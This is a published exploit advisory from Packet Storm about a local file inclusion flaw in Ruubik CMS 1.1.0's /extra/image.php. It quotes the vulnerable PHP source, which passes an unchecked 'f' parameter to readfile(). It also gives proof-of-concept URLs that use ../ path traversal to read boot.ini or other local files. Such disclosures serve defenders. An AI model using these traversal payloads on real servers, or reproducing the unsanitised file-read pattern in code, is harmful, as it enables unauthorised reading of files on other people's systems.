Ruubik CMS version 1.1.0 suffers from a local file inclusion vulnerability in /extra/image.php.
d2b1addd96e2e267f8d8f70e75e428f64d640a7bfab0a656996b01f6d5197ad6# Exploit Title: [Ruubikcms v 1.1.0 (/extra/image.php) Local File Inclusion Vulnerability]
# Date: [2011/10/16]
# Author: [Sangyun YOO]
# Software Link: [http://ruubikcms.com/ruubikcms/download.php?f=ruubikcms110.zip]
# Version: [Ruubikcms v 1.1.0]
# Tested on: [Windows 7 Starter K]
---------------------------------------
source of /extra/image.php:
1: if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify 2: image.");
3: $fpath = BASE_DIR.$_GET['f'];
4: if (!is_file($fpath)) die("File does not exist.");
5:
6: // file size in bytes
7: // $fsize = filesize($fpath);
8:
9: // get mime type
10: $mtype = '';
11:
12: if (function_exists('mime_content_type')) {
13: $mtype = mime_content_type($fpath);
14: } elseif (function_exists('finfo_file')) {
15: $finfo = finfo_open(FILEINFO_MIME); // return mime type
16: $mtype = finfo_file($finfo, $fpath);
17: finfo_close($finfo);
18: }
19:
20: if ($mtype == '') {
21: $mtype = "image/jpeg";
22: }
23:
24: header("Content-type: $mtype");
25: readfile($fpath); <--------------------- LFI
proof of concept:
http://[attacked_box]/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini
http://[attacked_box]/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed